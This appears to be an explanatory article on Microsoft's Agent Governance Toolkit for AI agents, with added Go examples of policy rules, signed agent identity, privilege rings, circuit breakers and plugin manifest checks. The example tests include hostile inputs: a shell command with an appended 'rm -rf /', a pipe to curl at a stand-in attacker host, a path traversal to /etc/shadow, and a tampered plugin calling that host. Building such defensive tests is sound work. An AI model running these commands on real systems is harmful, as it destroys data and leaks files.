On April 2, 2026, Microsoft released the Agent Governance Toolkit, a seven-package open-source project that provides runtime security governance for autonomous AI agents. The toolkit is available in Python, TypeScript, Rust, Go, and .NET, ships with over 9,500 tests, and addresses all 10 risks in the OWASP Agentic AI Top 10.
The release signals a shift in how the industry thinks about agent security. Rather than treating governance as an afterthought or a compliance checklist, Microsoft is positioning runtime security as infrastructure: something embedded into agent systems from the start rather than bolted on later.
Why Agent Governance Matters Now
The gap between building AI agents and governing them has widened dramatically. Modern agent frameworks like LangChain, CrewAI, AutoGen, and the Claude Agent SDK make it straightforward to create agents that can browse the web, execute code, manage files, and interact with external APIs. But almost none of them ship with built-in governance primitives.
This creates a specific class of risk: agents that work correctly in development but behave unpredictably in production. An agent that can execute shell commands can also delete databases. An agent that can call APIs can also exfiltrate data. An agent that delegates tasks to sub-agents can create uncontrolled chains of autonomous behavior.
The OWASP Agentic AI Top 10, published in early 2026, formalized these risks into categories:
| # | OWASP Risk | Description | Toolkit Package |
|---|---|---|---|
| 1 | Excessive Agency | Agent acts beyond intended scope | Agent OS |
| 2 | Insecure Tool Use | Unvalidated tool invocations | Agent OS, Agent Runtime |
| 3 | Prompt Injection | Adversarial input manipulation | Agent OS |
| 4 | Insufficient Monitoring | Blind spots in agent behavior | Agent SRE |
| 5 | Unsafe Output Handling | Unvalidated agent responses | Agent Runtime |
| 6 | Supply Chain Vulnerabilities | Untrusted plugins and tools | Agent Marketplace |
| 7 | Excessive Permissions | Over-privileged agent access | Agent Runtime |
| 8 | Data Leakage | Uncontrolled data exfiltration | Agent OS, Agent Mesh |
| 9 | Lack of Accountability | No audit trail for actions | Agent Compliance |
| 10 | Trust Boundary Violations | Cross-agent trust issues | Agent Mesh |
Microsoft presents the toolkit as the first major open-source project to address all ten systematically.
Toolkit Architecture Overview
The seven packages form a layered governance stack that wraps around an existing agent framework rather than replacing it.
The Seven Packages
The toolkit is organized into seven focused packages, each addressing a specific governance domain.
Agent OS: Policy Engine
Agent OS is a stateless policy engine that intercepts agent actions and evaluates them against configurable policies before the action executes. A policy check completes in under 0.1 ms at p99, which makes it practical to place in the hot path of every agent action without measurable overhead. That figure covers the policy evaluation itself (the summary table below labels it as such), not whatever work the caller does to gather the attributes a policy consults.
The engine supports three policy languages:
| Policy Language | Best For | Complexity |
|---|---|---|
| YAML Rules | Simple allow/deny patterns | Low |
| OPA Rego | Complex conditional logic | Medium |
| Cedar | Attribute-based access control | High |
Teams can mix policy languages within the same deployment, using simple YAML rules for common cases and Rego or Cedar for nuanced authorization decisions.
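To make the interception concrete, here is an added example of the kind of rule engine the YAML tier describes. It was written for this page in Go (one of the toolkit's languages) and is not the toolkit's code: the `Rule`, `Policy`, `Action`, `Decision` and `LoadPolicy` names, the JSON rule encoding and the sample rules are all this example's own. It shows the properties a practitioner should demand from simple allow/deny rules: ordered first-match evaluation, deny rules that narrow later allow rules, fully anchored argument patterns, and a default deny for any tool or argument the policy does not mention.

```go
package main

import (
	"encoding/json"
	"fmt"
	"regexp"
)

// Rule is one entry of an ordered allow/deny list, in the shape of the simple
// YAML-style rules described above. The field names and the JSON encoding are
// this example's own; the toolkit's rule schema is not shown in the article.
type Rule struct {
	Name   string            `json:"name"`
	Effect string            `json:"effect"` // "allow" or "deny"
	Tool   string            `json:"tool"`   // exact tool name, or "*" for any tool
	Args   map[string]string `json:"args"`   // argument name -> regexp the whole value must match
	re     map[string]*regexp.Regexp
}

// Policy is an ordered rule list evaluated first-match-wins with a default deny.
type Policy struct{ rules []Rule }

// Action is a tool call captured before it executes.
type Action struct {
	Tool string
	Args map[string]string
}

type Decision struct {
	Allow bool
	Rule  string // name of the deciding rule, or "default-deny"
}

// LoadPolicy parses and validates the rule list. Every argument pattern is
// anchored (^...$) so that "ls" cannot match "ls; rm -rf /" as a substring.
func LoadPolicy(doc []byte) (*Policy, error) {
	var rules []Rule
	if err := json.Unmarshal(doc, &rules); err != nil {
		return nil, err
	}
	for i := range rules {
		r := &rules[i]
		if r.Effect != "allow" && r.Effect != "deny" {
			return nil, fmt.Errorf("rule %q: effect must be allow or deny", r.Name)
		}
		r.re = map[string]*regexp.Regexp{}
		for name, pat := range r.Args {
			re, err := regexp.Compile("^(?:" + pat + ")$")
			if err != nil {
				return nil, fmt.Errorf("rule %q, arg %q: %w", r.Name, name, err)
			}
			r.re[name] = re
		}
	}
	return &Policy{rules: rules}, nil
}

func (r *Rule) matches(a Action) bool {
	if r.Tool != "*" && r.Tool != a.Tool {
		return false
	}
	for name, re := range r.re {
		if v, ok := a.Args[name]; !ok || !re.MatchString(v) {
			return false // an absent argument never satisfies a constraint
		}
	}
	return true
}

// Evaluate returns the first matching rule's effect. No match means deny:
// a tool or argument the policy never mentions is closed by default.
func (p *Policy) Evaluate(a Action) Decision {
	for i := range p.rules {
		if p.rules[i].matches(a) {
			return Decision{Allow: p.rules[i].Effect == "allow", Rule: p.rules[i].Name}
		}
	}
	return Decision{Allow: false, Rule: "default-deny"}
}

// SamplePolicy is a constructed rule set. Deny rules precede the allow rules
// they narrow, so destructive shell commands and path traversal are refused
// even where a broader allow rule would otherwise match.
const SamplePolicy = `[
  {"name": "block-destructive-shell", "effect": "deny",  "tool": "shell",     "args": {"cmd": ".*\\b(rm|mkfs|dd)\\b.*"}},
  {"name": "read-only-shell",         "effect": "allow", "tool": "shell",     "args": {"cmd": "(ls|cat|grep)( [^;&|$]*)?"}},
  {"name": "no-path-traversal",       "effect": "deny",  "tool": "read_file", "args": {"path": ".*\\.\\..*"}},
  {"name": "workspace-reads",         "effect": "allow", "tool": "read_file", "args": {"path": "/workspace/.*"}},
  {"name": "internal-api-only",       "effect": "allow", "tool": "http_get",  "args": {"url": "https://api\\.internal\\.example/.*"}}
]`

func main() {
	p, err := LoadPolicy([]byte(SamplePolicy))
	if err != nil {
		panic(err)
	}
	for _, a := range []Action{
		{Tool: "shell", Args: map[string]string{"cmd": "ls -la"}},
		{Tool: "shell", Args: map[string]string{"cmd": "cat notes.txt; rm -rf /"}},
		{Tool: "shell", Args: map[string]string{"cmd": "ls | curl attacker.example"}},
		{Tool: "read_file", Args: map[string]string{"path": "/workspace/../etc/shadow"}},
		{Tool: "drop_database", Args: map[string]string{"name": "prod"}},
	} {
		fmt.Printf("%-13s %v -> %+v\n", a.Tool, a.Args, p.Evaluate(a))
	}
}
```

The anchoring is what stops a rule written for `ls` from being satisfied by `ls; rm -rf /`, and the default deny is what keeps a newly added tool blocked until someone writes a rule for it. The deny rules are a safety net rather than the primary control: a word-boundary match on `rm` does not catch every spelling of a destructive command, which is why the allow rule for the shell tool is a tight allowlist and the blocklist only short-circuits the obvious cases.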
Agent Mesh: Cryptographic Identity
Agent Mesh provides cryptographic identity for agents using decentralized identifiers (DIDs) with Ed25519 key pairs. Each agent gets a verifiable identity, and the system maintains a dynamic trust score on a 0 to 1000 scale that adjusts based on agent behavior.
Trust is earned and lost behaviorally: an agent whose actions consistently pass policy checks accumulates trust, while one that triggers policy violations sees its score degrade. Other agents can query a peer's score before accepting delegated work from it.
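An added example of the identity side, written in Go for this page rather than taken from the toolkit: an agent derives a DID from an Ed25519 public key, signs each intended action, and a registry verifies the signature, refuses replays, and moves the agent's 0 to 1000 score according to the policy outcome. The did:key layout with a base64url multibase, the envelope fields, the starting score of 300 and the +5/-50 steps are all assumptions of this example; the article states none of them and does not name the toolkit's DID method.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"encoding/base64"
	"encoding/json"
	"fmt"
	"strings"
)

// did:key layout: multicodec 0xed01 + raw Ed25519 key, multibase-encoded. The spec's
// base58btc ("z") is swapped for the base64url multibase ("u") to stay in the standard library.
func DIDFromKey(pub ed25519.PublicKey) string {
	return "did:key:u" + base64.RawURLEncoding.EncodeToString(append([]byte{0xed, 0x01}, pub...))
}

// KeyFromDID recovers the key a did:key embeds, so verifying needs no registry lookup.
func KeyFromDID(did string) (ed25519.PublicKey, error) {
	raw, err := base64.RawURLEncoding.DecodeString(strings.TrimPrefix(did, "did:key:u"))
	if !strings.HasPrefix(did, "did:key:u") || err != nil || len(raw) != 2+ed25519.PublicKeySize || raw[0] != 0xed || raw[1] != 0x01 {
		return nil, fmt.Errorf("%q is not a did:key carrying an Ed25519 key", did)
	}
	return ed25519.PublicKey(raw[2:]), nil
}

// ActionEnvelope is a signed "agent iss intends to call tool"; Sig is excluded from the signed bytes.
type ActionEnvelope struct {
	Issuer string `json:"iss"`
	Tool   string `json:"tool"`
	Args   string `json:"args"`
	Nonce  string `json:"nonce"` // unique per action, so the verifier can refuse replays
	Sig    string `json:"sig,omitempty"`
}

func (e ActionEnvelope) signingBytes() []byte {
	e.Sig = ""
	b, _ := json.Marshal(e) // struct field order is fixed, which stands in for canonicalization
	return b
}

func Sign(priv ed25519.PrivateKey, e ActionEnvelope) ActionEnvelope {
	e.Issuer = DIDFromKey(priv.Public().(ed25519.PublicKey))
	e.Sig = base64.RawURLEncoding.EncodeToString(ed25519.Sign(priv, e.signingBytes()))
	return e
}

// Constructed scoring: enter at 300 on the first verified action; one violation costs ten compliant actions.
const InitialTrust, MaxTrust, Reward, Penalty = 300, 1000, 5, 50

// TrustRegistry verifies envelopes and keeps each agent's 0 to 1000 score.
type TrustRegistry struct {
	scores map[string]int
	seen   map[string]bool // issuer|nonce pairs already accepted
}

func NewTrustRegistry() *TrustRegistry {
	return &TrustRegistry{scores: map[string]int{}, seen: map[string]bool{}}
}

// Score is what a peer consults before delegating; an agent never verified scores 0.
func (r *TrustRegistry) Score(did string) int { return r.scores[did] }

// Accept verifies the signature, refuses replays, then moves the issuer's score by the policy outcome.
func (r *TrustRegistry) Accept(e ActionEnvelope, policyPassed bool) (int, error) {
	pub, err := KeyFromDID(e.Issuer)
	sig, _ := base64.RawURLEncoding.DecodeString(e.Sig)
	if err != nil || !ed25519.Verify(pub, e.signingBytes(), sig) {
		return 0, fmt.Errorf("unverifiable envelope for %s from %s", e.Tool, e.Issuer)
	}
	key := e.Issuer + "|" + e.Nonce
	if r.seen[key] {
		return 0, fmt.Errorf("replayed nonce %q from %s", e.Nonce, e.Issuer)
	}
	r.seen[key] = true
	s, known := r.scores[e.Issuer]
	if !known {
		s = InitialTrust
	}
	if policyPassed {
		s += Reward
	} else {
		s -= Penalty
	}
	if s < 0 {
		s = 0
	} else if s > MaxTrust {
		s = MaxTrust
	}
	r.scores[e.Issuer] = s
	return s, nil
}

func main() {
	_, priv, _ := ed25519.GenerateKey(rand.Reader)
	reg := NewTrustRegistry()
	env := Sign(priv, ActionEnvelope{Tool: "http_get", Args: `{"url":"https://api.internal.example/v1"}`, Nonce: "n-1"})
	fmt.Println(reg.Accept(env, true)) // 305 <nil>
	fmt.Println(reg.Accept(env, true)) // 0 replayed nonce "n-1" from did:key:u7Q...
}
```

A delegation decision is then `reg.Score(did) >= threshold`. Two caveats apply to anything built this way: the score only means something if every action is signed and verified (an unsigned action must not move it), and the set of seen nonces grows without bound here, so a real registry should scope replay detection to a time window carried in the envelope.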
Agent Runtime: Execution Rings
Agent Runtime implements execution rings modeled on CPU privilege levels:
| Ring | Privilege Level | Agent Type | Allowed Actions |
|---|---|---|---|
| Ring 0 | Full Access | System orchestrators | All system resources |
| Ring 1 | Elevated | Trusted agents | Network, file system, APIs |
| Ring 2 | Standard | Regular agents | Scoped tools, sandboxed execution |
| Ring 3 | Restricted | Untrusted / new agents | Read-only, no network, no file writes |
Just as an OS kernel runs at Ring 0 with full hardware access while user programs run at Ring 3 with restricted access, agents are assigned execution rings that determine what system resources they can access.
The runtime includes saga orchestration for complex multi-step agent workflows and emergency kill switches for immediate termination of runaway agents.
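As an added example of how a runtime can enforce rings without touching the agent's own tool code (written in Go for this page; not the toolkit's code, and the `Capability`, `Agent`, `Invoke`, `Promote` and `ErrKilled` names are invented), the block below models each ring as a capability set, gates an unchanged tool function through an `Invoke` wrapper, writes an audit record for every attempt, and adds a kill switch that stops the agent at its next action. The capability assignment per ring is this example's reading of the table above.

```go
package main

import (
	"errors"
	"fmt"
	"sync/atomic"
)

// Capability is one kind of system access a tool needs.
type Capability uint8

const (
	CapRead    Capability = 1 << iota // read files and scoped data
	CapWrite                          // create, modify or delete files
	CapNetwork                        // outbound network and external APIs
	CapExec                           // run code or shell commands
	CapAdmin                          // control other agents or the runtime itself
)

// Ring is an agent's privilege level; lower is more privileged, as with CPU
// rings. The capability sets are this example's reading of the table above, not
// the toolkit's definitions. A ring that is not listed grants nothing at all.
type Ring int

var ringCaps = map[Ring]Capability{
	0: CapRead | CapWrite | CapNetwork | CapExec | CapAdmin, // system orchestrators
	1: CapRead | CapWrite | CapNetwork | CapExec,            // trusted agents
	2: CapRead | CapWrite | CapExec,                         // scoped tools, sandboxed execution
	3: CapRead,                                              // untrusted or new: read-only, no network
}

// Tool names an existing tool function and the capabilities any call to it needs.
type Tool struct {
	Name     string
	Requires Capability
}

// AuditEvent is written for every attempted call, allowed or refused.
type AuditEvent struct {
	Agent, Tool, Reason string
	Ring                Ring
	Allowed             bool
}

var ErrKilled = errors.New("agent terminated by kill switch")

// Agent wraps an existing agent. Its tool functions stay as they are; the
// runtime only insists that they run through Invoke.
type Agent struct {
	ID     string
	Ring   Ring
	Audit  []AuditEvent
	killed atomic.Bool
}

// Kill is the emergency stop: a flag that Invoke checks first, so a runaway
// agent is halted at its very next action whatever it was doing.
func (a *Agent) Kill() { a.killed.Store(true) }

// Invoke runs fn only if the agent is alive and its ring grants every capability
// the tool requires. The decision precedes execution: a refused tool never runs.
func (a *Agent) Invoke(t Tool, fn func() (string, error)) (string, error) {
	if a.killed.Load() {
		a.record(t, false, ErrKilled.Error())
		return "", ErrKilled
	}
	if missing := t.Requires &^ ringCaps[a.Ring]; missing != 0 {
		reason := fmt.Sprintf("ring %d lacks capability %#b for %s", a.Ring, missing, t.Name)
		a.record(t, false, reason)
		return "", errors.New(reason)
	}
	a.record(t, true, "ring grants the required capabilities")
	return fn()
}

func (a *Agent) record(t Tool, allowed bool, reason string) {
	a.Audit = append(a.Audit, AuditEvent{Agent: a.ID, Tool: t.Name, Ring: a.Ring, Allowed: allowed, Reason: reason})
}

// Promote changes an agent's ring. Changing rings is itself an administrative
// action, so the caller must hold CapAdmin; a ring 3 agent cannot promote itself.
func Promote(by, target *Agent, to Ring) error {
	if ringCaps[by.Ring]&CapAdmin == 0 {
		return fmt.Errorf("%s in ring %d may not change rings", by.ID, by.Ring)
	}
	target.Ring = to
	return nil
}

func main() {
	worker := &Agent{ID: "worker-7", Ring: 3}
	readFile := func() (string, error) { return "file contents", nil }
	httpGet := func() (string, error) { return "200 OK", nil }
	fmt.Println(worker.Invoke(Tool{Name: "read_file", Requires: CapRead}, readFile))
	fmt.Println(worker.Invoke(Tool{Name: "http_get", Requires: CapNetwork}, httpGet))
	worker.Kill()
	fmt.Println(worker.Invoke(Tool{Name: "read_file", Requires: CapRead}, readFile))
	for _, ev := range worker.Audit {
		fmt.Printf("%+v\n", ev)
	}
}
```

Two details carry most of the security value. The capability check uses "required and not granted", so a tool that needs several capabilities is refused if any one is missing, and an agent in a ring the table does not define gets nothing. Ring changes go through `Promote`, which itself requires the admin capability, so the lowest-privilege agent cannot raise its own ring, which is the agent-world version of a user process not being able to enter ring 0.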
Agent SRE: Production Reliability
Agent SRE applies site reliability engineering practices to agent systems:
- SLO Definitions: Service Level Objectives specific to agent workloads (e.g., "95% of tool calls complete within 5s")
- Error Budgets: track agent reliability over rolling windows and auto-disable capabilities when a budget is exhausted
- Circuit Breakers: automatically disable failing agent capabilities after configurable failure thresholds
- Chaos Engineering: inject faults (latency, errors, resource exhaustion) to test agent resilience
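The first three bullets are one mechanism seen from three angles, and the added example below (Go, written for this page; not the toolkit's API, and `Guard`, `NewGuard`, `Allow` and `Record` are invented names) shows them together: an SLO measured over a rolling window of calls, an error budget derived from it, and a breaker that opens when the budget is overspent or when failures arrive back to back, then lets exactly one probe call through after a cooldown. The window of 20 calls, the 5 s latency budget, the trip-after-3 rule and the 30 s cooldown are constructed values.

```go
package main

import (
	"fmt"
	"time"
)

// State of the breaker that guards one agent capability.
type State int

const (
	Closed   State = iota // calls flow and every outcome is scored against the SLO
	Open                  // capability disabled: calls are refused before execution
	HalfOpen              // cooldown elapsed: exactly one probe call is let through
)

func (s State) String() string { return [...]string{"closed", "open", "half-open"}[s] }

// Guard measures an SLO such as "95% of tool calls complete within 5s" over a
// rolling window of calls and opens a breaker when the window's error budget is
// overspent or failures arrive back to back. Every parameter here is constructed
// for this example; the article does not give the toolkit's defaults.
type Guard struct {
	Target        float64          // required success ratio, e.g. 0.95
	LatencyBudget time.Duration    // a slower call counts as failed even if it returned
	Window        int              // number of most recent calls the SLO is measured over
	TripAfter     int              // consecutive failures that open the breaker at once
	Cooldown      time.Duration    // time the breaker stays open before one probe is allowed
	Now           func() time.Time // injectable clock
	State         State
	openedAt      time.Time
	history       []bool // true = failed; newest last; at most Window entries
	consecutive   int
}

func NewGuard(target float64, latency time.Duration, window, tripAfter int, cooldown time.Duration) *Guard {
	return &Guard{Target: target, LatencyBudget: latency, Window: window, TripAfter: tripAfter, Cooldown: cooldown, Now: time.Now}
}

// ErrorBudget is how many failures the window may hold before the SLO is breached.
func (g *Guard) ErrorBudget() int { return int(float64(g.Window) * (1 - g.Target)) }

// BudgetRemaining going negative is the breach condition.
func (g *Guard) BudgetRemaining() int {
	failed := 0
	for _, bad := range g.history {
		if bad {
			failed++
		}
	}
	return g.ErrorBudget() - failed
}

// Allow is asked before every call. An open breaker fails closed, the safe
// direction for an agent capability: a tool that cannot run cannot do harm.
func (g *Guard) Allow() bool {
	if g.State == Open && g.Now().Sub(g.openedAt) >= g.Cooldown {
		g.State = HalfOpen // let exactly one probe through
		return true
	}
	return g.State == Closed
}

// Record scores a completed call and drives the state machine.
func (g *Guard) Record(latency time.Duration, err bool) {
	bad := err || latency > g.LatencyBudget
	if g.State == HalfOpen { // the probe decides: reopen, or close on a fresh window
		if bad {
			g.trip()
		} else {
			g.State, g.history, g.consecutive = Closed, nil, 0
		}
		return
	}
	g.history = append(g.history, bad)
	if len(g.history) > g.Window {
		g.history = g.history[1:]
	}
	if g.consecutive++; !bad {
		g.consecutive = 0
	}
	if g.consecutive >= g.TripAfter || g.BudgetRemaining() < 0 {
		g.trip()
	}
}

func (g *Guard) trip() { g.State, g.openedAt, g.consecutive = Open, g.Now(), 0 }

func main() {
	g := NewGuard(0.95, 5*time.Second, 20, 3, 30*time.Second)
	for i := 0; i < 22; i++ { // 19 fast calls, two that blow the latency budget, one more attempt
		if !g.Allow() {
			fmt.Printf("call %2d refused: breaker %s\n", i, g.State)
			continue
		}
		latency := 200 * time.Millisecond
		if i >= 19 {
			latency = 7 * time.Second
		}
		g.Record(latency, false)
		fmt.Printf("call %2d: budget remaining %d, breaker %s\n", i, g.BudgetRemaining(), g.State)
	}
}
```

Note that a slow call that eventually returned still burns budget: for an agent workload, a tool that takes a minute is as much of a failure as one that errors, because the agent will usually retry or route around it. The injectable clock is there so the cooldown path can be tested without sleeping.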
Agent Compliance: Regulatory Mapping
Agent Compliance provides automated governance verification that maps agent behavior to regulatory frameworks:
| Framework | Coverage | Key Requirements |
|---|---|---|
| EU AI Act | Risk classification, transparency | Obligations depend on the agent's risk classification |
| HIPAA | Data access logging, encryption | Required for health data agents |
| SOC2 | Access control, monitoring | Enterprise compliance baseline |
Rather than requiring manual compliance audits, the system continuously evaluates agent actions against regulatory requirements and generates compliance reports.
Agent Marketplace: Plugin Lifecycle
Agent Marketplace manages the lifecycle of agent plugins and tools with manifest verification. It ensures that tools loaded by agents come from verified sources and have not been tampered with, addressing the supply chain risk that the OWASP framework identified.
Agent Lightning: Training Governance
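What "manifest verification" has to check is easy to get wrong, so here is an added example (Go, written for this page; the `Manifest` schema, `SignManifest` and `Verify` are this example's assumptions, not the toolkit's). The publisher signs a manifest that pins the artifact's SHA-256, and the agent host loads the plugin only if the publisher key is on its allowlist, the manifest signature verifies, and the bytes about to be loaded match the pinned digest.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"crypto/subtle"
	"encoding/hex"
	"encoding/json"
	"fmt"
)

// Manifest describes one plugin artifact. The field set is this example's own;
// the article does not show the toolkit's manifest schema.
type Manifest struct {
	Name      string `json:"name"`
	Version   string `json:"version"`
	SHA256    string `json:"sha256"`    // hex digest of the artifact bytes that will be loaded
	Publisher string `json:"publisher"` // hex Ed25519 public key of the signer
	Sig       string `json:"sig,omitempty"`
}

// signingBytes covers every field except the signature itself.
func (m Manifest) signingBytes() []byte {
	m.Sig = ""
	b, _ := json.Marshal(m)
	return b
}

// SignManifest runs in the publisher's release pipeline, never on the agent host.
func SignManifest(priv ed25519.PrivateKey, name, version string, artifact []byte) Manifest {
	sum := sha256.Sum256(artifact)
	m := Manifest{Name: name, Version: version, SHA256: hex.EncodeToString(sum[:]),
		Publisher: hex.EncodeToString(priv.Public().(ed25519.PublicKey))}
	m.Sig = hex.EncodeToString(ed25519.Sign(priv, m.signingBytes()))
	return m
}

// Verify is the gate on the agent host. trusted is the operator's allowlist of
// publisher keys: a valid signature from an unknown key is still refused, which
// is what separates "signed" from "trusted". The digest is checked on the exact
// bytes about to be loaded, so a swap after download is caught too.
func Verify(m Manifest, artifact []byte, trusted map[string]bool) error {
	if !trusted[m.Publisher] {
		return fmt.Errorf("%s@%s: publisher %s is not in the allowlist", m.Name, m.Version, m.Publisher)
	}
	pub, err := hex.DecodeString(m.Publisher)
	if err != nil || len(pub) != ed25519.PublicKeySize {
		return fmt.Errorf("%s@%s: malformed publisher key", m.Name, m.Version)
	}
	sig, err := hex.DecodeString(m.Sig)
	if err != nil || !ed25519.Verify(ed25519.PublicKey(pub), m.signingBytes(), sig) {
		return fmt.Errorf("%s@%s: manifest signature invalid", m.Name, m.Version)
	}
	want, err := hex.DecodeString(m.SHA256)
	sum := sha256.Sum256(artifact)
	if err != nil || subtle.ConstantTimeCompare(sum[:], want) != 1 {
		return fmt.Errorf("%s@%s: artifact digest does not match manifest", m.Name, m.Version)
	}
	return nil
}

func main() {
	pub, priv, _ := ed25519.GenerateKey(rand.Reader)               // the publisher's key pair
	trusted := map[string]bool{hex.EncodeToString(pub): true}    // operator-managed allowlist
	artifact := []byte("def run(url):\n    return fetch(url)\n") // constructed plugin body
	m := SignManifest(priv, "web-fetch", "1.2.0", artifact)
	fmt.Println("clean:", Verify(m, artifact, trusted))
	fmt.Println("tampered:", Verify(m, []byte("def run(url):\n    os.system('curl attacker.example')\n"), trusted))
	_, attacker, _ := ed25519.GenerateKey(rand.Reader)
	fmt.Println("unknown publisher:", Verify(SignManifest(attacker, "web-fetch", "1.2.0", artifact), artifact, trusted))
}
```

The allowlist check is the part most often skipped: an attacker can always produce a correctly signed manifest with a key of their own, so signature validity alone proves nothing about origin. Verification also belongs at load time on the bytes that will execute, not at download time on a copy that may be replaced before use.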
Agent Lightning provides governance guardrails for reinforcement learning workflows used to train agent behavior. It ensures that training processes respect the same policy constraints that production agents operate under.
Integration Without Rewrites
A key design decision is that the toolkit integrates with existing agent frameworks without requiring rewrites. Teams using LangChain, CrewAI, AutoGen, Azure AI Foundry, or Google ADK add governance to their existing agents by wrapping tool calls and agent actions with the toolkit's policy engine: the framework keeps orchestrating, and the toolkit decides what each action may do.
This matters because governance adoption typically fails when it requires architecture changes. By operating as middleware that intercepts actions rather than replacing frameworks, the toolkit reduces the barrier to adoption from "rewrite your agent system" to "add a policy layer."
Toolkit at a Glance
| Dimension | Details |
|---|---|
| License | MIT |
| Languages | Python, TypeScript, Rust, Go, .NET |
| Test Suite | 9,500+ tests |
| OWASP Coverage | 10/10 Agentic AI Top 10 risks |
| Latency Impact | < 0.1ms p99 (Agent OS policy checks) |
| Compatible Frameworks | LangChain, CrewAI, AutoGen, Azure AI Foundry, Google ADK |
| Policy Languages | YAML, OPA Rego, Cedar |
| Future Governance | Planned move to open foundation |
What This Means for Agent Builders
For teams building production agent systems, the toolkit provides three immediately useful capabilities:
Deterministic policy enforcement: agent actions are evaluated against explicit policies before execution, not merely monitored after the fact. This is the difference between a guardrail and a dashcam.
Agent identity and trust: multi-agent systems get cryptographic identity and dynamic trust scoring, enabling principled delegation decisions rather than implicit trust between agents.
Compliance automation: regulatory mapping runs continuously rather than as a periodic manual audit, catching compliance drift as agent behavior evolves.
The toolkit is released under the MIT license, with Microsoft planning to move it to a foundation for community governance.
